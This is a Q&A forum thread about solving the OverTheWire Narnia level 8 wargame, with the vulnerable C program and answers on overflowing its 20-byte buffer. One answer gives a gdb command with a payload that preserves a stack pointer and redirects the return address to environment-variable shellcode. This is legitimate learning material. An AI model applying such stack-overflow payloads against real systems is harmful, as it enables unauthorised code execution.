# Really struggling on OverTheWire Narnia level 8

Tags: c, linux

I have been teaching myself hacking, computer security, and ctf concepts through OverTheWire's wargames, but I am really stuck on narnia8. I can't think of how to go about solving this problem because a classic buffer overflow technique doesn't work and I can't understand why. The point of this level is to somehow obtain a shell by exploiting the following vulnerable code:

```
#include <stdlib.h>
#include <string.h>
// gcc's variable reordering messes things up
// to keep the level in its old style i am
// making "i" global until i find a fix
// -morla
int i;

void func(char *b){
        char *blah=b;
        char bok[20];
        //int i=0;

        memset(bok, '\0', sizeof(bok));
        for(i=0; blah[i] != '\0'; i++)
                bok[i]=blah[i];

        printf("%s\n",bok);
}

int main(int argc, char **argv){

        if(argc > 1)
                func(argv[1]);
        else
        printf("%s argument\n", argv[0]);

        return 0;
}
```

I've taken the code into gdb and tried to analyze the stack pointer and view if I was overwriting any registers, but every time I try to like a format string exploit or a buffer overflow, it doesn't seem to work. I tried overflowing bok with a string of greater than 20 characters for example 28, but I only ever see 20 characters in the register. I'm a beginner so I'm sorry if I have to ask a lot of questions in the comments below.

Comment: Please choose a title which is useful for others with the same issue.

Answer (score 1):

i obtained the shell in gdb, after 20 bytes in the row of buffer next four bytes are the address of pointer which is blah. when we write 21 byte it disturbs the address of pointer so flow stops there only, to keep it continue you should try to write the address of pointer decreasing with every byte you are adding to buffer because stack goes towards low memory. then you can check for return address of function on location ebp+4. overwrite the return address of function with the address of environment variable with shellcode.

```
(gdb) r $(python -c 'print "A"*20+"\x1f\xd8\xff\xff" + "b"*4 + "\x5c\xde\xff\xff"')
```

[enter image description here](https://i.stack.imgur.com/5ffhf.jpg)

Answer (score 0):

You probably only put in too few chars (gcc makes a frame have a min size of 32 bytes if I remember correctly).
You should definitely be able to overflow `bok` but `i` will also be overridden so make sure it will have a valid value (-1 best I guess).

Comment: You know the rule ( https://meta.stackexchange.com/questions/214173/why-do-i-need-50-reputation-to-comment-what-can-i-do-instead ). So if you are convinced that what you are writing is a comment then don't.  This I turned into a non-assertive, not very helpful, vague answer. As such you risk bad feedback, but the feedback on misusing an answer for a comment you are not yet entitled to would be worse. You probably want to consider deleting this. Or [edit] to turn it into a better answer.

Comment: You can turn this into a good answer, because it kind of already follows the compromise described here https://meta.stackoverflow.com/questions/334822/how-do-i-ask-and-answer-homework-questions Just edit to do it intentionally and explicitly.

Comment: Yunnosch, this isn't a homework question... But I agree about the vague answer. I just need somewhere to start, I'm not begging for an answer, just someone to point me in the right direction

Comment: But to explain, I tried to overflow the buffer bok by just inputting more than 20 characters. So for example, I made b (the argument passed into func) 30 A characters long, but then looking at the stack, I found that there were only 20 A characters in the buffer.

Comment: I apply that homework concept also to people who learn by doing challenges or similar "solve-by-code" concepts.